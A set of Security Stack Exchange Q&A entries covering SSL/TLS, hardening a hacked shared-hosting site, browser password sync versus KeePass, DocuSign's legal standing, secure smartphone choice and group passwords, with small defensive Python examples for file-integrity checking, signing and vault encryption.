This is a kind of attack model that cannot be countered without a comprehensive cryptographic protocol that extends over all the data, not just an initial authentication method. About the simplest kind of such protocol is SSL/TLS. Any protocol that provides the same guarantees, that you absolutely need, will also be as complex as SSL/TLS, and much harder to implement because, contrary to SSL/TLS, it is not already implemented in the client software. SSL is there, just use it. As for the lemon, suck it up. (If the financial cost is a barrier, there are free alternatives, such as Let's Encrypt and pki.io . Whether they fit your bill remains to be seen, but they are worth considering if you are really short on cash.)
{ "source": [ "https://security.stackexchange.com/questions/116835", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103807/" ] }
116,877
(While the answers and comments at How do I deal with a compromised server? are useful, my question is more about prevention of hacking when I do not have total (or much) control over the server. I have SSH access but not root privileges. I cannot see or change anything beyond my own user account.) I volunteer for a non-profit, maintaining their web site for them. We've been on a low-budget shared hosting platform (Bluehost) for several years. The site was built on Wordpress and I did my best to keep core WP and all plugins up to date. But we got hacked multiple times. Sometimes it was malicious (defacing the home page) while other times it was stealthy (I discovered hidden files that seemed to just allow someone to get in and snoop around). I totally got rid of WP, rebuilding the site on Bootstrap. I removed all files from the server, ran multiple virus scans on the local version of the new site, grep'd for anything that would be suspicious, and then uploaded the files to the server. I was nearly 100% sure this new codebase was "clean". But within a few days, I discovered (by comparing the server to my local version) a hacked index.php (some 'preg-replace' code was inserted before the first line) and found a "logo-small.png" file in a subdirectory that was not really an image file. It was a big hunk of obfuscated PHP that looked set to do nasty things (I de-obfuscated and viewed the code). I knew that shared hosts, often with hundreds of sites, could be vulnerable. At this point, I totally distrust the server we're on. But when I asked Bluehost if we'd be safer on a VPS or dedicated server (thinking our "sandbox" would be harder to get into), they said it wouldn't really make a difference. So I'm in a quandary. The non-profit I help out has a limited budget. But I also don't want to continue spending tens to hundreds of hours monitoring and fixing the site. I don't know if hackers are getting in via the file system or an open port that shouldn't be open. Is there a cost-effective solution that provides much better "hardening"?
If the only thing you expose to the internet is non-interactive web pages and you do not need to run server-side components, then you can substantially lower your risks by using a static web site . You are then left with the web engine itself and, to some extent, the underlying OS. Apache or nginx are not simple to harden, so you could have a look at Cherokee or publicfile . You can go one step further by either hosting your static files on an existing environment which accepts them ( Github Pages for instance) or moving to a site you build with blocks like Google Sites (which are free for non-profit organizations).
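The question's method of catching the tampered index.php - comparing the live server against a known-good local copy - can also be automated, whichever hosting option is chosen. Below is a rough sketch in Python (standard library only; the paths and file names are hypothetical) that builds a SHA-256 manifest of a directory tree and reports anything added, removed or modified since the baseline. It only detects tampering; it does not prevent it.

```python
import hashlib
import json
import os
import sys


def build_manifest(root: str) -> dict:
    """Map each file's path (relative to root) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                manifest[rel] = hashlib.sha256(fh.read()).hexdigest()
    return manifest


def compare(baseline: dict, current: dict) -> None:
    """Print every file that appeared, disappeared or changed."""
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline:
            print("ADDED   ", rel)
        elif rel not in current:
            print("REMOVED ", rel)
        elif baseline[rel] != current[rel]:
            print("MODIFIED", rel)


if __name__ == "__main__":
    # Illustrative usage: save a baseline from the clean copy once,
    # then re-check a freshly downloaded copy of the live site later.
    #   python check_site.py save  /path/to/clean/copy      baseline.json
    #   python check_site.py check /path/to/live/site/copy  baseline.json
    mode, root, manifest_file = sys.argv[1], sys.argv[2], sys.argv[3]
    if mode == "save":
        with open(manifest_file, "w") as out:
            json.dump(build_manifest(root), out, indent=2)
    else:
        with open(manifest_file) as saved:
            compare(json.load(saved), build_manifest(root))
```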
{ "source": [ "https://security.stackexchange.com/questions/116877", "https://security.stackexchange.com", "https://security.stackexchange.com/users/52415/" ] }
116,881
I wonder, how wise is it to allow Chrome and Firefox to a) remember the passwords and b) synchronize them? My gut tells me that even if no man in the middle can intercept them, Google and Mozilla themselves can see them on their servers or with the help of their browsers. Of course, they say they won't and the passwords are stored encrypted, but can we know that for sure? Maybe the browsers themselves secretly send the passwords to Google and Mozilla. I've just begun using KeePass recently, so at least I have a place where my passwords are stored locally, because previously I stored them only in the browsers and synchronized them. And now I think I shouldn't synchronize them anymore.
To expand on what @d1str0 said: if the creator of your browser wanted to steal your passwords, it would be trivial to send them to a manufacturer-controlled server whenever you entered them - they don't need to bother with the hassle of telling you about sync procedures, or offering to remember passwords. All browsers by default send a certain level of usage data back, usually crash reports and update checks, which could easily conceal password and username data. However, if any browser was found to be doing this, there would be an outcry against that manufacturer - look at the rage directed at Microsoft following the release of Windows 10 with the reporting back enabled there.

KeePass and Password Safe are both open source (so, given sufficient programming knowledge, and a trusted compiler, you can be sure they're doing what they say they are, and nothing else - sufficient programming knowledge may well be a very high level though). In both cases, the encrypted password files should be safe to sync, even to third-party services, as long as the safe password is not provided. Breaking AES (KeePass) or Twofish (Password Safe) without the appropriate key (the safe password) comes down, as far as we know, to brute force.

LastPass and 1Password both require you to trust the developers, and sync by default to a remote location. Theoretically, they are safe, but there wouldn't be any obvious way to detect a vulnerability in them relating to storage. If you're concerned about Chrome or Firefox stealing passwords, logically, the same arguments apply to these apps.

Personally, I use one of the cloud based password services mentioned - I've considered the risks and benefits, and balanced the amount of security I'm willing to accept against the ease of use for the service, and decided that for my use cases, it's acceptable. Your acceptable risk might well be different - if you consider AES as vulnerable, for example, keeping a KeePass safe on an encrypted USB key which uses a different encryption algorithm might be a viable option, but uploading the file to a third-party service might be "too risky" for you. It comes down to what you consider safe, having evaluated the options.

Many security professionals have considered this problem though, and generally advise using password safe type software over allowing browsers to remember passwords, simply because browsers used to be terrible at it - they allowed access without a master password, and used poor encryption methods. Some of these issues have been addressed now, but old habits die hard!
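To illustrate why a properly encrypted vault file is reasonably safe to sync, here is a rough sketch of the general construction such tools use: derive a key from the master password with a deliberately slow KDF, then encrypt the entries under that key. This uses Python's cryptography package and Fernet (an AES-based scheme) purely as an example - it is not KeePass's or Password Safe's actual file format, and the iteration count is a placeholder, not a recommendation.

```python
import base64
import json
import os

from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC


def derive_key(master_password: str, salt: bytes) -> bytes:
    # A deliberately slow derivation, so brute-forcing the master password
    # against a stolen vault file is expensive.
    kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32,
                     salt=salt, iterations=600_000)
    return base64.urlsafe_b64encode(kdf.derive(master_password.encode("utf-8")))


def lock(entries: dict, master_password: str) -> bytes:
    salt = os.urandom(16)
    token = Fernet(derive_key(master_password, salt)).encrypt(
        json.dumps(entries).encode("utf-8"))
    # The salt is not secret; it just has to travel with the ciphertext.
    return salt + token


def unlock(blob: bytes, master_password: str) -> dict:
    salt, token = blob[:16], blob[16:]
    data = Fernet(derive_key(master_password, salt)).decrypt(token)
    return json.loads(data)


vault = lock({"example.org": "hunter2"}, master_password="a long master passphrase")
# The blob can be synced anywhere; without the master passphrase,
# recovering the entries means brute-forcing the passphrase itself.
print(unlock(vault, "a long master passphrase"))
```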
{ "source": [ "https://security.stackexchange.com/questions/116881", "https://security.stackexchange.com", "https://security.stackexchange.com/users/32926/" ] }
116,896
I've never been happy with the explanation DocuSign gives for themselves in their own marketing material (e.g. https://www.docusign.com/how-it-works/electronic-signature/digital-signature/digital-signature-faq , https://www.docusign.com/products/electronic-signature and https://www.docusign.com/how-it-works/security ). I have a number of questions:

1. For me, if I want a document to be signed, I need to encrypt the hash of the document with my private key, and any recipients can verify the signature by decrypting my signature's hash and comparing it with their own recompute of the hash. On DocuSign I cannot see where or how I can provide my own private key (which would be a huge security issue in itself) nor will it let me keep my private key private (i.e. on my premises, not uploaded to their server). There is also no mention of any public key - in fact there's no way for me to verify the integrity and authorship of any document as DocuSign simply doesn't give that type of metadata to me, I just have to take their word for it that the document hasn't been tampered with.

2. How does DocuSign verify identity in a meaningful way? So far all I can tell is that they can verify email address ownership (or at least mailbox access ); I don't remember ever being required to verify my identity by driving license or passport scan uploads - so how is that legally considered proof-of-identity? How is it a signature in any way if it cannot provably be linked with my real-life identity? Anyone could claim one of my expired Hotmail addresses and create a DocuSign account for me and sign things with it.

3. I have a problem with DocuSign being simultaneously 1) the verifier of identity, 2) the holder of the documents, and 3) the generator of the signatures - the fact it's a single legal entity means they have the legal, and certainly the technical, means of altering any document, its signature, and claims about that signature; considering recent news events where certain first-world nations' governments try to coerce companies to decrypt their data, this means I'm not likely to consider DocuSign trustworthy enough to "sign" anything significant. There is also the fact that DocuSign's codebase is proprietary and not accessible - I have to take their word (on their homepage, no less) that they have been independently audited and that the audit means something.

4. I also don't like how they generate a fake handwritten "signature" image - I thought it has been established that simply having a photo of anyone's handwriting next to some text does not constitute a signature. I'm concerned about the effect this may have on users: a kind of " CSI effect " where the crypto-layperson will think that a picture of their signature is enough and then apply this learned "fact" to other platforms, thus worsening the public's awareness of PKI (after all the progress we've made educating users about SSL).

Given the problems I think I found in DocuSign above - if I were involved in a legal case, such as a contractual dispute, and the version on DocuSign is brought as evidence - can either party in the suit legitimately claim that the DocuSign document is bona-fide, and conversely how easily could the other party show the "signature" cannot be trusted? i.e. can anyone sum up DocuSign's service and categorically say if it's cryptographically, or at least legally, sound?
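For reference, here is a minimal sketch of the conventional sign/verify flow the question describes, using Python's cryptography package. Strictly speaking, modern schemes such as RSA-PSS are not literally "encrypting the hash with the private key", but the shape - sign with the private key, verify with the public key - is the same; the key size and the document bytes are illustrative. The sketch covers only the cryptographic half; binding the key pair to a real-world identity is the separate, and legally harder, problem discussed in the answer below.

```python
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

# The signer keeps the private key; only the public key is shared.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=3072)
public_key = private_key.public_key()

document = b"I agree to pay 100 EUR by the end of the month."

# Sign: hash the document and produce an RSA-PSS signature over it.
signature = private_key.sign(
    document,
    padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                salt_length=padding.PSS.MAX_LENGTH),
    hashes.SHA256(),
)

# Verify: anyone holding the public key can check the signature;
# a single changed byte in the document makes verification fail.
try:
    public_key.verify(
        signature,
        document,
        padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                    salt_length=padding.PSS.MAX_LENGTH),
        hashes.SHA256(),
    )
    print("signature valid")
except InvalidSignature:
    print("signature INVALID")
```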
A signature is, ultimately, a legal concept. When you sign a document, you are really producing a legal gun aimed at your own head (so you usually want other people to sign things, not sign them yourself). The value of a signature comes from its legal power, i.e. how much it allows responsibility and blame to be applied to the signer. The cryptographic elements (RSA and so on) are only tools that can help build the technical side of things, but that cannot suffice. Ultimately, there must be some kind of legal framework that defines signatures. Of course, this will depend on jurisdiction. Nevertheless, countries/states that are currently defining laws for electronic signatures tend to go along the same lines:

A signature is binding as long as it was really signed by the alleged signer. This looks tautological, but it is an important definition: it really says that the signature's legal value is not intrinsic to any specific technology. Writing your name at the end of an email is a signature.

What matters is the burden of proof . Legal frameworks will normally segregate systems into two categories: those for which signatures are reputed good, and it is the party who denies having signed who must make all the proofing work; and those for which signatures are reputed worthless unless a positive proof of attribution to the alleged signer is shown. "Name at the end of an email" belongs to the latter category; a positive proof may be simply a witness who saw the signer type the email.

The reference for signatures is handwritten signatures, which are, technically speaking, absolutely terrible. They are hard to validate, and can be faked. Handwritten signatures are still used thanks to a legal framework that severely punishes anybody who denies his own signature. Since handwritten signatures occur in the physical world, the very act of signing (with a pen) leaves a lot of traces (witnesses and so on), so many people ultimately find that repudiating their own signatures is too risky.

A further complication is that legal systems of the "Common Law" tradition tend to rely on jurisprudence to iron out the fine details, so countries like the USA and UK will likely have legal frameworks for signatures that boil down to "wait and see" ("see you in court", I mean). In France (which has a very "Latin" law system that really likes pre-established rigorous definitions, Descartes-style), the legal framework defines systems which are qualifiés , by which they mean that they went through independent audits and an administrative process that has all the simplicity that can be expected from French bureaucracy, to the effect that for these systems, the burden of proof lies on whoever claims that the signature is not binding. The list of the systèmes qualifiés is published and I see no DocuSign there [edit - as of July 21, 2017, DocuSign France is now listed].

DocuSign has a page dedicated to the legality side of things -- which is in fact a lot more important than the technology. In particular, they say this:

While DocuSign has a successful history of providing customers with all the evidence they need to defend their documents against repudiation, DocuSign is available to assist our customers with legal challenges by testifying in court to support the validity of DocuSigned documents.

which implicitly admits that their system tends to be of the "must prove validity" kind, i.e. not the one you would like -- but they claim to have had good results in some courts, and that they will help you. 
At that point, I'd say that if you want to use DocuSign for making your customers / business partners sign things, you'd better make sure that there are appropriate clauses in your contract that ensure a strong level of help from DocuSign, with insurance and so on. Your lawyer team should be involved.
{ "source": [ "https://security.stackexchange.com/questions/116896", "https://security.stackexchange.com", "https://security.stackexchange.com/users/69237/" ] }
117,009
I'm looking at replacing my very old android smartphone. Information security is increasingly a feature that I'm looking for. As well as being slow, I don't think I can upgrade my current handset to the latest android versions or even the latest version of the mobile security app I use, so almost anything would likely be an improvement. Ideally I'm looking for a handset or ROM which has security (ideally encrypting data in communication and at rest) as a priority and will likely still be secure (with updates) in several years' time. I'd prefer an android solution, unless security on other platforms is significantly better/easier to achieve. Is the choice of handset a significant consideration, or is security mainly down to the way it is used - regular updates, careful checking of apps before installation? PLEASE NOTE : I am not looking for a specific recommendation , but rather guidance in knowing what to look for . Feel free to pop recommendations in the comments - but NOT the answers.
TLDR: There are several categories of security you must consider when looking for a phone. The main advice, though, is to get a newer phone with the latest security features, and from a manufacturer that has a good reputation of providing updates.

Security against other people (peers, police/government)

Look for newer devices with full disk encryption, and at the very least have a code or fingerprint required to unlock your device. Both Android and iOS have the ability to encrypt the phone. When booting the phone, the password must be provided to finish booting and to view files.

Upside: Your phone is protected from external attempts to read the data.
Downside: You must type in your password/PIN every time you boot, and usually every time you unlock your screen.

As this is built-in to more recent versions of Android and iOS, you must slightly narrow your search to exclude older phones that don't have this capability.

Encryption key vs unlock code

As a usability/security tradeoff, I prefer to have a long password required on boot, but have a simpler code to unlock the screen. Apple does this natively, letting you set a PIN or password required on boot, but thereafter letting you unlock the phone with your fingerprint.

Upside: You can use a complex password, while keeping the ease of unlocking your phone quickly.
Upside: A shoulder-surfer can't unlock your phone, since your fingerprint unlocks it. They would have to catch you as you type in the password on boot. (When you type your password, be sure no one is watching!)
Downside: Your fingerprint is not protected by law (in the U.S.). The police can force you to unlock the phone with your fingerprint. Whereas a password or code, something you know, cannot be forced out of you. Even if a court orders you and holds you in contempt for failing to provide the unlock code, they cannot access your data without your cooperation.

On a rooted Android device, you can install a mod that lets you have a complex boot password and a simpler PIN for the screen unlock. If you enter the PIN incorrectly, it requires the strong password to be entered, which prevents brute-force attempts at the much simpler PIN. You are losing some security, however, since anyone shoulder-surfing could see you put in your PIN and later steal the phone for unlocking.

Upside: You can use a complex password, while keeping the ease of unlocking your phone quickly.
Upside: Only your knowledge can unlock the device.
Downside: You must enter a PIN every time you unlock the screen. As this happens frequently, it is much more likely that someone could find out your simple unlock combination.

Security against apps

Check app permissions before installing, and make sure you get a newer phone that has extra permission management.

Apple/iOS: Apple devices (excluding jailbroken ones) can only install apps that have gone through Apple's vetting process. While this isn't 100% successful, it does protect most users from installing a malicious app. On top of that, certain obvious privacy features, such as GPS location and contact info, require an extra user prompt to allow an app to access that information.

Android 6.0+: Android permission settings before 6.0 Marshmallow were all-or-nothing. If an app requested permissions to your GPS, you either allowed it or didn't install the app. Android 6.0 introduces similar features to iOS that let the user deny certain permissions while still installing the app. If looking at Android devices, this narrows the eligible devices, excluding phones that don't have Android 6.0 or newer.

Android 4.x-5.x with XPrivacy: However, if the Android device has root and can install the Xposed framework, you can install XPrivacy. That app overhauls the permission model on Android so that nearly every possible privacy-related permission can be allowed or denied in real time. If the app tries to use GPS, it prompts you to allow or deny (or provide fake/null information). This is available to most rootable Android devices running any version of Android 4.0 to 5.0. Look for a phone that can be rooted if you want extreme privacy permission tweaking.

Security against bugs/exploits

Look for phones made by manufacturers with a history of regular updates. Most iOS and Android updates include bug fixes along with new features. As long as the iOS device is supported, they can all get the update at the same time when it is released. On Android, Nexus devices are generally the first to receive updates. For other manufacturers, make sure they have a history of providing updates to older phones and within a reasonable timeframe. Alternatively, find an Android phone with an unlocked bootloader and an active development community. While more technical, this can be the fastest way to get the latest updates, even after a manufacturer has stopped supporting the phone.

Security against the device manufacturer

Buy devices from a trusted manufacturer, and make sure it uses full-disk encryption where the manufacturer does not hold the key. Also, for Android, consider a device with an unlockable bootloader to be able to load custom ROMs with newer security updates and better privacy features built-in.

Apple devices cannot be unlocked even by Apple starting in iOS 8. While it may be possible in theory for Apple to provide an update that subverts this, currently it is impossible for Apple to unlock your phone or gain access to the encrypted partition on your phone. If you have iCloud Backup enabled, however, that data can be accessed by Apple. Similarly, Android devices with Full Disk Encryption enabled cannot be unlocked by the manufacturer, or even Google.

Unlocked bootloader: With Android devices, an unlocked bootloader lets you install custom ROMs, or even make your own built from scratch using the Android OS source code. If your phone is no longer supported by the manufacturer, you can still update to the latest version of Android, assuming someone has compiled a ROM for your device. Some Android ROMs have additional security and privacy controls built-in. Warning: This can be detrimental to security. Make sure to use a ROM that is widely known and trusted.

Security in the cloud

Use a cloud storage provider that encrypts your data and does not have access to the unlock key. Almost all cloud storage (Dropbox, iCloud, etc) store files in a non-encrypted way, or in a way that the cloud provider could decrypt the files without the user's permission. The primary way to protect against this is to not use cloud storage. If you need to back up your files, use your own encrypted server or manually copy files onto an encrypted desktop computer.

A few storage providers, such as MEGA and SpiderOak, do encrypt your files. The encryption key is not accessible to them, and a government entity would have to coerce them to write an update to their software in order to acquire the unlock key from a user. Android and Apple both have apps for MEGA that work similarly to Dropbox, including automatically saving photos taken by the phone.

Security against networks

Make sure your phone can use VPN software, and possibly use Tor to increase privacy. And be sure to browse the web with https when possible. The internet service provider can view all of your unencrypted network traffic. To help avoid this, use a VPN. Note: the VPN can see your unencrypted data as well. Use a trusted VPN provider.

The ISP can even determine some information from encrypted network traffic, if you aren't using a VPN. If you open a web page that uses https, the ISP can see which domain you are going to. They cannot, however, see the specific page you are requesting, nor the data of the page itself.

If extreme privacy is a need, Tor may be the answer. It has plenty of downsides, the primary being slow speed (compared to normal browsing). But when using Tor, your ISP cannot see your network information, aside from the fact that you're using Tor. And the nodes on Tor are unable to know both the source (you) and destination (the website) due to the way the protocol is designed.
{ "source": [ "https://security.stackexchange.com/questions/117009", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34123/" ] }
117,013
I am developing a tool for a company that takes some technical data and creates PDF reports. In the tool you have several text fields, which get filled by the database. If the user wants to, he can change the contents of the text fields. In the end, he presses a button and some reports get created, archived and sent to the customer.

My boss made the proposal to just use a group password for everyone, so every user of the tool knows the password and simply has to enter his own username. I refrained from this and told him this would be convenient, but unsafe, mainly because of identity theft: someone can simply enter another username than his own and fill the text fields with nonsense that gets sent to the customer, print a report 300 times, create the report 500 times, etc.

We discussed this a little bit further and after he realised that an attacker indeed could do some damage, at least to the reputation, we tried to find a scenario where such a group password would be acceptable. This got me curious: are there environments or situations where such a group password would be acceptable? Or will it always get shot down with the "identity theft" argument?
{ "source": [ "https://security.stackexchange.com/questions/117013", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99028/" ] }